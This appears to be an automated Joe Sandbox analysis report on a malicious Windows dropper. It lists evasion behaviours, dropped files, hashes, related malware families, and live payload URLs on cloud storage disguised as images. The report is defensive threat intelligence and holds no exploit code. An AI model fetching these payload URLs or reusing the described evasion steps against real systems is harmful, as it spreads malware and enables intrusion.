Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Process Injection (11) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
Behavior Graph (rendered as an image in the original report; the details recoverable from it are listed here)
Behavior Graph ID: 1584634 | Sample: 2749837485743-7684385786.05.exe | Start date: 06/01/2025 | Architecture: WINDOWS | Score: 92
Domains and IPs: sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com (118.178.60.9, port 443, CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd, China); sc-231t.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com (39.103.20.26, port 443, CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd, China); sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com; 4 other IPs or domains
Process tree: 2749837485743-7684385786.05.exe -> 5oqa98.exe (two instances) and 4 other processes; 5oqa98.exe -> cmd.exe (four instances); each cmd.exe -> conhost.exe, schtasks.exe and further child processes; the other processes -> reg.exe (three instances) and 5 other processes
Dropped files: C:\Windows\System32\drivers\189atohci.sys (PE32+); C:\Users\user\Documents\vselog.dll (PE32+); C:\Users\user\Documents\5oqa98.exe (PE32+); C:\Program Files (x86)\naBa3A\naBa3A.exe (PE32)
Signatures attached to the graph: Malicious sample detected (through community Yara rule); Sigma detected: Invoke-Obfuscation CLIP+ Launcher; AI detected suspicious sample; Sigma detected: Invoke-Obfuscation VAR+ Launcher; Drops PE files to the document folder of the user; Sample is not signed and drops a device driver; Tries to detect virtualization through RDTSC time measurements; Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Found direct / indirect Syscall (likely to bypass EDR); Uses cmd line tools excessively to alter registry or file data; Uses schtasks.exe or at.exe to add and modify task schedules; Adds extensions / path to Windows Defender exclusion list (Registry)

Source | Detection | Scanner | Label | Link
2749837485743-7684385786.05.exe | 3% | Virustotal | |
2749837485743-7684385786.05.exe | 3% | ReversingLabs | |
Source | Detection | Scanner | Label | Link
C:\Program Files (x86)\naBa3A\naBa3A.exe | 0% | ReversingLabs | |
C:\Users\user\Documents\5oqa98.exe | 0% | ReversingLabs | |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.gif | 0% | Avira URL Cloud | safe |
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgF7e8 | 0% | Avira URL Cloud | safe |
https://22mm.oss-cn-hangzhou.aliyuncs.com/q | 0% | Avira URL Cloud | safe |
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgd/ | 0% | Avira URL Cloud | safe |
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgK | 0% | Avira URL Cloud | safe |
https://hu5wd1.oss-cn-beijing.aliyuncs.com/s.dat | 0% | Avira URL Cloud | safe |
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpghttps://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51 | 0% | Avira URL Cloud | safe |
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg:7y8 | 0% | Avira URL Cloud | safe |
https://22mm.oss-cn-hangzhou.aliyuncs.com/f.data | 0% | Avira URL Cloud | safe |
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-53.jpg | 0% | Avira URL Cloud | safe |
https://hu5wd1.oss-cn-beijing.aliyuncs.com/c.gif | 0% | Avira URL Cloud | safe |
https://22mm.oss-cn-hang | 0% | Avira URL Cloud | safe |
https://hu5wd1.oss-cn-beijing.aliyuncs.com/b.gif | 0% | Avira URL Cloud | safe |
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg- | 0% | Avira URL Cloud | safe |
https://22mm.oss-cn-hangzhou.aliyuncs.com/$ | 0% | Avira URL Cloud | safe |
https://hu5wd1.oss-cn-beijing.aliyuncs.com/s.jpg | 0% | Avira URL Cloud | safe |
https://22mm.oss-cn-hangzhou.aliyuncs.com/ngzhou.aliyuncs.com/17-2476756634-1003 | 0% | Avira URL Cloud | safe |
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgr: | 0% | Avira URL Cloud | safe |
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgJ7i8 | 0% | Avira URL Cloud | safe |
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg4/ | 0% | Avira URL Cloud | safe |
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpgHQx8 | 0% | Avira URL Cloud | safe |
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg | 0% | Avira URL Cloud | safe |
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg | 0% | Avira URL Cloud | safe |
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgr718 | 0% | Avira URL Cloud | safe |
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-52.jpg | 0% | Avira URL Cloud | safe |
https://22mm.oss-cn-hangzhou.aliyuncs.com/ | 0% | Avira URL Cloud | safe |
https://hu5wd1.oss-cn-beijing.aliyuncs.com/i.dat | 0% | Avira URL Cloud | safe |
https://22mm.oss-cn-hangzhou.aliyuncs.com/17-2476756634-1003 | 0% | Avira URL Cloud | safe |
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg | 0% | Avira URL Cloud | safe |
https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.gif | 0% | Avira URL Cloud | safe |
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpgT/ | 0% | Avira URL Cloud | safe |
https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com | 118.178.60.9 | true | false | | unknown
sc-231t.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com | 39.103.20.26 | true | false | | unknown
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | high
22mm.oss-cn-hangzhou.aliyuncs.com | unknown | unknown | false | | unknown
hu5wd1.oss-cn-beijing.aliyuncs.com | unknown | unknown | false | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://hu5wd1.oss-cn-beijing.aliyuncs.com/d.gif | false | Avira URL Cloud: safe | unknown
https://hu5wd1.oss-cn-beijing.aliyuncs.com/s.dat | false | Avira URL Cloud: safe | unknown
https://hu5wd1.oss-cn-beijing.aliyuncs.com/c.gif | false | Avira URL Cloud: safe | unknown
https://hu5wd1.oss-cn-beijing.aliyuncs.com/s.jpg | false | Avira URL Cloud: safe | unknown
https://hu5wd1.oss-cn-beijing.aliyuncs.com/b.gif | false | Avira URL Cloud: safe | unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/drops.jpg | false | Avira URL Cloud: safe | unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-50.jpg | false | Avira URL Cloud: safe | unknown
https://hu5wd1.oss-cn-beijing.aliyuncs.com/i.dat | false | Avira URL Cloud: safe | unknown
https://hu5wd1.oss-cn-beijing.aliyuncs.com/a.gif | false | Avira URL Cloud: safe | unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/FOM-51.jpg | false | Avira URL Cloud: safe | unknown
https://22mm.oss-cn-hangzhou.aliyuncs.com/f.dat | false | Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
118.178.60.9 | sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com | China | 37963 | CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | false
39.103.20.26 | sc-231t.cn-beijing.oss-adns.aliyuncs.com.gds.alibabadns.com | China | 37963 | CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | false
                    Joe Sandbox version:41.0.0 Charoite
                    Analysis ID:1584634
                    Start date and time:2025-01-06 04:41:12 +01:00
                    Joe Sandbox product:CloudBasic
                    Overall analysis duration:0h 7m 9s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                    Number of analysed new started processes analysed:42
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:0
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Sample name:2749837485743-7684385786.05.exe
                    Detection:MAL
                    Classification:mal92.evad.winEXE@55/18@2/2
                    EGA Information:
                    • Successful, ratio: 100%
                    HCA Information:Failed
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                    • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtOpenKeyEx calls found.
                    • Report size getting too big, too many NtQueryValueKey calls found.
                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:43:47 | Task Scheduler | Run new task: yeSle path: C:\Users\user\Documents\5oqa98.exe
22:42:06 | API Interceptor | 941x Sleep call for process: 2749837485743-7684385786.05.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
118.178.60.9 | 2b687482300.6345827638.08.exe | malicious | Unknown
 | 45631.exe | malicious | Nitol
 | 0000000000000000.exe | malicious | Nitol
 | T1#U5b89#U88c5#U52a9#U624b1.0.2.exe | malicious | Nitol
Match | Associated Sample Name / URL | Detection | Threat Name | Context
s-part-0017.t-0009.t-msedge.net | Insomia.exe | malicious | LummaC | 13.107.246.45
 | setup64v6.4.5.msi | malicious | Unknown | 13.107.246.45
 | 3LcZO15oTC.exe | malicious | Unknown | 13.107.246.45
 | 3LcZO15oTC.exe | malicious | Unknown | 13.107.246.45
 | Tax_Refund_Claim_2024_Australian_Taxation_Office.js | malicious | Remcos | 13.107.246.45
 | 4XYAW8PbZH.exe | malicious | Remcos | 13.107.246.45
 | GpuXmm386e.msi | malicious | Unknown | 13.107.246.45
 | yKkpG6xM4S.msi | malicious | Unknown | 13.107.246.45
 | IlPF8gbvGl.msi | malicious | Unknown | 13.107.246.45
 | iGhDjzEiDU.exe | malicious | Remcos | 13.107.246.45
sc-29j7.cn-hangzhou.oss-adns.aliyuncs.com.gds.alibabadns.com | 2b687482300.6345827638.08.exe | malicious | Unknown | 118.178.60.9
 | 45631.exe | malicious | Nitol | 118.178.60.9
 | 0000000000000000.exe | malicious | Nitol | 118.178.60.9
 | T1#U5b89#U88c5#U52a9#U624b1.0.2.exe | malicious | Nitol | 118.178.60.9
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | cZO.exe | malicious | Unknown | 120.77.100.135
 | z0r0.m68k.elf | malicious | Mirai | 8.133.115.153
 | 2b687482300.6345827638.08.exe | malicious | Unknown | 39.103.20.34
 | 2b687482300.6345827638.08.exe | malicious | Unknown | 39.103.20.34
 | N5kEzgUBn6.exe | malicious | CobaltStrike, Metasploit | 101.201.227.94
 | N5kEzgUBn6.exe | malicious | CobaltStrike, Metasploit | 101.201.227.94
 | 3.elf | malicious | Unknown | 8.189.180.251
 | 3.elf | malicious | Unknown | 8.138.48.163
 | armv6l.elf | malicious | Unknown | 223.4.27.34
 | armv5l.elf | malicious | Unknown | 8.130.140.184
Match | Associated Sample Name / URL | Detection | Threat Name | Context
37f463bf4616ecd445d4a1937da06e19 | drop1.exe | malicious | CredGrabber, Meduza Stealer | 39.103.20.26, 118.178.60.9
 | ZT0KQ1PC.exe | malicious | PureLog Stealer, Vidar | 39.103.20.26, 118.178.60.9
 | LinxOptimizer.exe | malicious | Unknown | 39.103.20.26, 118.178.60.9
 | setup.msi | malicious | Unknown | 39.103.20.26, 118.178.60.9
 | drop1.exe | malicious | CredGrabber, Meduza Stealer | 39.103.20.26, 118.178.60.9
 | 2b687482300.6345827638.08.exe | malicious | Unknown | 39.103.20.26, 118.178.60.9
 | 2b687482300.6345827638.08.exe | malicious | Unknown | 39.103.20.26, 118.178.60.9
 | K27Yg4V48M.exe | malicious | LummaC | 39.103.20.26, 118.178.60.9
 | IH5XqCdf06.exe | malicious | LummaC | 39.103.20.26, 118.178.60.9
 | Tax_Refund_Claim_2024_Australian_Taxation_Office.js | malicious | Remcos | 39.103.20.26, 118.178.60.9
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\Documents\5oqa98.exe | 2b687482300.6345827638.08.exe | malicious | Unknown
 | 2b687482300.6345827638.08.exe | malicious | Unknown
 | 45631.exe | malicious | Nitol
 | 45631.exe | malicious | Unknown
 | 0000000000000000.exe | malicious | Nitol
 | 0000000000000000.exe | malicious | Unknown
 | T1#U5b89#U88c5#U52a9#U624b1.0.2.exe | malicious | Nitol
C:\Program Files (x86)\naBa3A\naBa3A.exe | 2b687482300.6345827638.08.exe | malicious | Unknown
 | 45631.exe | malicious | Nitol
 | 0000000000000000.exe | malicious | Nitol
 | T1#U5b89#U88c5#U52a9#U624b1.0.2.exe | malicious | Nitol
 | setup.ic19.exe | malicious | GhostRat, Nitol
                                                    Process:C:\Users\user\Documents\5oqa98.exe
                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                    Category:dropped
                                                    Size (bytes):54152
                                                    Entropy (8bit):6.64786972992462
                                                    Encrypted:false
                                                    SSDEEP:768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
                                                    MD5:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                    SHA1:E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
                                                    SHA-256:7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
                                                    SHA-512:E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
                                                    Malicious:false
                                                    Antivirus:
                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                    Joe Sandbox View:
• Filename: 2b687482300.6345827638.08.exe, Detection: malicious
• Filename: 45631.exe, Detection: malicious
• Filename: 0000000000000000.exe, Detection: malicious
• Filename: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious
• Filename: setup.ic19.exe, Detection: malicious
                                                    Process:C:\Users\user\Documents\5oqa98.exe
                                                    File Type:very short file (no magic)
                                                    Category:dropped
                                                    Size (bytes):1
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3:k:k
                                                    MD5:55A54008AD1BA589AA210D2629C1DF41
                                                    SHA1:BF8B4530D8D246DD74AC53A13471BBA17941DFF7
                                                    SHA-256:4BF5122F344554C53BDE2EBB8CD2B7E3D1600AD631C385A5D7CCE23C7785459A
                                                    SHA-512:7B54B66836C1FBDD13D2441D9E1434DC62CA677FB68F5FE66A464BAADECDBD00576F8D6B5AC3BCC80844B7D50B1CC6603444BBE7CFCF8FC0AA1EE3C636D9E339
                                                    Malicious:false
                                                    Preview:.
                                                    Process:C:\Users\user\Documents\5oqa98.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                    Category:dropped
                                                    Size (bytes):241664
                                                    Entropy (8bit):7.9985420019333615
                                                    Encrypted:true
                                                    SSDEEP:6144:Y2U97rw6BjnaXjcqXxxPgfkbDBuTsIjLMI:YX93wOjnaN74fkpos1I
                                                    MD5:496DCE3EC0D56E97EF1E79F1C3C0D871
                                                    SHA1:5A189D1E33E5093B91F8ECD695ACFB71D85ADE17
                                                    SHA-256:6293F4D234C9E82CA66479DC065E495DCF67C6B43F66F923B3285B4334A42663
                                                    SHA-512:5C9A6C552A5A07BE5442A8D0ACA54C10262A304DD8733BAAB9F58343164AFB259B5CD3A4BEFC387BA08E846AEE7C461EA9658C313C6907132FB6ED072A5B3AAD
                                                    Malicious:false
                                                    Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):125333
                                                    Entropy (8bit):7.993522712936246
                                                    Encrypted:true
                                                    SSDEEP:3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
                                                    MD5:2CA9F4AB0970AA58989D66D9458F8701
                                                    SHA1:FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
                                                    SHA-256:5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
                                                    SHA-512:AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
                                                    Malicious:false
                                                    Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                    Category:dropped
                                                    Size (bytes):8299
                                                    Entropy (8bit):7.9354275320361545
                                                    Encrypted:false
                                                    SSDEEP:192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
                                                    MD5:9BDB6A4AF681470B85A3D46AF5A4F2A7
                                                    SHA1:D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
                                                    SHA-256:5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
                                                    SHA-512:5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
                                                    Malicious:false
                                                    Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):10681
                                                    Entropy (8bit):7.866148090449211
                                                    Encrypted:false
                                                    SSDEEP:192:fN3El4oBtN9pmD65VoeotpeGy/nmgVtKFbM/PvMZ5ZWtZl4EehHGXI9Fch5:fN3E7NW27oJWJ+M/8ZCDuEe2I9FS5
                                                    MD5:10A818386411EE834D99AE6B7B68BE71
                                                    SHA1:27644B42B02F00E772DCCB8D3E5C6976C4A02386
                                                    SHA-256:7545AC54F4BDFE8A9A271D30A233F8717CA692A6797CA775DE1B7D3EAAB1E066
                                                    SHA-512:BDC5F1C9A78CA677D8B7AFA2C2F0DE95337C5850F794B66D42CAE6641EF1F8D24D0F0E98D295F35E71EBE60760AD17DA1F682472D7E4F61613441119484EFB8F
                                                    Malicious:false
                                                    Process:C:\Users\user\Documents\5oqa98.exe
                                                    File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):37274
                                                    Entropy (8bit):7.991781062764932
                                                    Encrypted:true
                                                    SSDEEP:768:6uBASoT9gu8yCOpS/DCNuoaa7SOjrX+ACdA7EtGKDRklnvga371DNpnN7s:fGSfyxENa7ZCRtxylnvgAVNI
                                                    MD5:6D4DEB9526F3973DE0F9DCE9392F8EA7
                                                    SHA1:520128FB9BAB7064BEA992E4427B924073E58C0E
                                                    SHA-256:B415D73DC6CBEEE59736ADD1AF397B6982BDB2B3A9E994797EE6AF5979E58FD1
                                                    SHA-512:F07E0DAEEE5C54BC8DB462630F46A339D9ED0AF346BAB113B4EC7FD2BC463AFC04CBD0FDFC8D9F54528B7127AA7735575A255B85F2D0B3CCD518FC5DC39BA447
                                                    Malicious:false
                                                    Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...
                                                    Process:C:\Users\user\Documents\5oqa98.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                    Category:dropped
                                                    Size (bytes):55085
                                                    Entropy (8bit):7.99273647746538
                                                    Encrypted:true
                                                    SSDEEP:1536:puwkqL5y4p4KnRWlENc3PGdLLv/PJctIJPc+pifyC:kQM4+B/MLL/PmaG
                                                    MD5:DC44AE348E6A74B3A74871020FDFAC74
                                                    SHA1:B223020A5F82FF15FD5E4930477F38F34C9CB919
                                                    SHA-256:48F258037BE0FFE663DA3BCD47DBA22094CC31940083D9E18A71882BDC1ECDB8
                                                    SHA-512:5FB13A8CE2206119C76325504DEF61D4277A73D71D79157AE564F326D6FC18080218633CE7C708F31A81D6CD1A5AD8A903CFE1CC0C57183B4809A9C12E32A429
                                                    Malicious:false
                                                    Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~..a.....=..>.A
                                                    Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):135589
                                                    Entropy (8bit):7.995304392539578
                                                    Encrypted:true
                                                    SSDEEP:3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
                                                    MD5:0DDD3F02B74B01D739C45956D8FD12B7
                                                    SHA1:561836F6228E24180238DF9456707A2443C5795C
                                                    SHA-256:2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
                                                    SHA-512:0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
                                                    Malicious:false
                                                    Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                                    Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):28272
                                                    Entropy (8bit):7.711624741629693
                                                    Encrypted:false
                                                    SSDEEP:384:9qegCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQi:t5F1FUdy422IK+gAZt2i0YPpQn4GMB
                                                    MD5:7C371D180E92F0A8A5F6224E68440683
                                                    SHA1:236F9DC8883EDCD7A73B75C02C8523774DC498BD
                                                    SHA-256:29658608F2D1640EFD3BCC606507700D04910A937933712A4189C1A41DD58791
                                                    SHA-512:CC4992D0647BA5D27B8822C0538BF2FE1C0025E8232D48160D0FCCEDF34270568DCECAC3E33D94A0279B9F43FFE2EC25F300FC79AB4D4FAAB74012B73D3CB9B9
                                                    Malicious:false
                                                    Preview:..(.........GG..............................................P..........{Z.z7..c_6,./]@H]<0}>_PPQ%q34.FAZz34z>5)Z75>?.225.5555555..G\.@f.z\.@f.{\.@f...\.@f...\.@f...\.@f...\.@f...\.@f...\.@f4......4444444444444444444444444dq44P.<4.g.bbbbbbbbb.b@bi`kbbXbbbpbbbbbb..bbbrbbbbcbbbbbbrbbb`bbdbcbdbcbdbcbbbbbb.bbbfbb..bbcbbbbbfbbbbbbrbbbbbbbbrbbbbbbrbbbbbbbbbbrbbbbbbbbbbbr.bbJbbbb.bb.abbb.bb.cbbb2bb.|bbb.bb&bbb.#bb~bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb"bb.cbbbbbbbbbbbbbbbbbbbbbbbbbbL...n....6.......4..................:..r\...gr.......S.......!..............S..[u?:/N////-///.///-///.//////////////o//......"............................................................................?.........................]s/./L///.,///.///+///e//////////////o//mC...nb...............O..............A..CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC
                                                    Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                    File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                    Category:dropped
                                                    Size (bytes):3892010
                                                    Entropy (8bit):7.995495589600101
                                                    Encrypted:true
                                                    SSDEEP:98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
                                                    MD5:E4E46F3980A9D799B1BD7FC408F488A3
                                                    SHA1:977461A1885C7216E787E5B1E0C752DC2067733A
                                                    SHA-256:6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
                                                    SHA-512:9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
                                                    Malicious:false
                                                    Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                                    Process:C:\Users\user\Documents\5oqa98.exe
